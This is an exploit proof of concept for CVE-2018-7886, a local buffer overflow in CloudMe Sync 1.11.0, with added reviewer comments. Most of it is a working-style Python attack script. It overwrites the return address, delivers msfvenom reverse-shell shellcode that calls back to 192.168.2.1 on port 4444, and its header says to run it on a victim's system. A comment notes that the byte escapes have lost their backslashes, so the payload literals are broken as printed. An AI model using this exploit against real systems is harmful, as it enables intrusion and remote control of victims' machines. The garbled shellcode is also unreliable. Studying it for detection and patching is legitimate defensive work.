#######################################################
# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1110.exe
# Category: Local
# Exploit Discovery: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 1.11.0
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2018-7886
# Solution: Update CloudMe Sync to 1.11.2
#######################################################

#Disclosure Date: March 12, 2018
#Response Date: March 14, 2018
#Bug Fixed: April 12, 2018

# Run this file in victim's win 7 sp1 x86 system where CloudMe Sync 1.11.0 has been installed.

# Proof-of-concept listing for CVE-2018-7886 (CloudMe Sync 1.11.0, see header):
# builds an oversized buffer and writes it to a TCP service on the local host.
# Kept for defensive reference; the header gives the fixed version (1.11.2).
import socket

# Loopback only: the header says the script is run on the affected host itself.
target="127.0.0.1"

# 1052 bytes of filler placed before the value the author labels `eip`.
junk="A"*1052

# Per the author's comment, overwrites the return address with a JMP ESP inside
# Qt5Core.dll. NOTE(review): in this copy of the listing the `\` of each byte
# escape is missing, so this literal and the ones below are plain ASCII text.
eip="x7Bx8AxA9x68" #68a98a7b : JMP ESP - Qt5Core.dll

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c

# Reverse-shell stub produced by the msfvenom command above. The callback
# endpoint is baked into the bytes: 192.168.2.1 appears as c0 a8 02 01 and
# port 4444 as 11 5c (network order) in the last third of the stub — the
# outbound connection a defender would hunt for after a crash of the service.
shellcode=("xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
"x77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68"
"x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68"
"xeax0fxdfxe0xffxd5x97x6ax05x68xc0xa8x02x01x68"
"x02x00x11x5cx89xe6x6ax10x56x57x68x99xa5x74x61"
"xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0xb5xa2"
"x56xffxd5x68x63x6dx64x00x89xe3x57x57x57x31xf6"
"x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01x8dx44"
"x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56"
"x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56x46xff"
"x30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6"
"x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb"
"x47x13x72x6fx6ax00x53xffxd5")

# Filler, return-address overwrite, then the stub: a plain stack-smash layout.
payload=junk+eip+shellcode

# Delivers the buffer to TCP port 8888 on loopback in a single send; nothing is
# read back and the socket is never closed. A local listener on 8888 accepting
# unauthenticated input of this size is the exposure the fix in 1.11.2 addresses
# (presumably the CloudMe Sync service itself — confirm against the vendor notes).
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)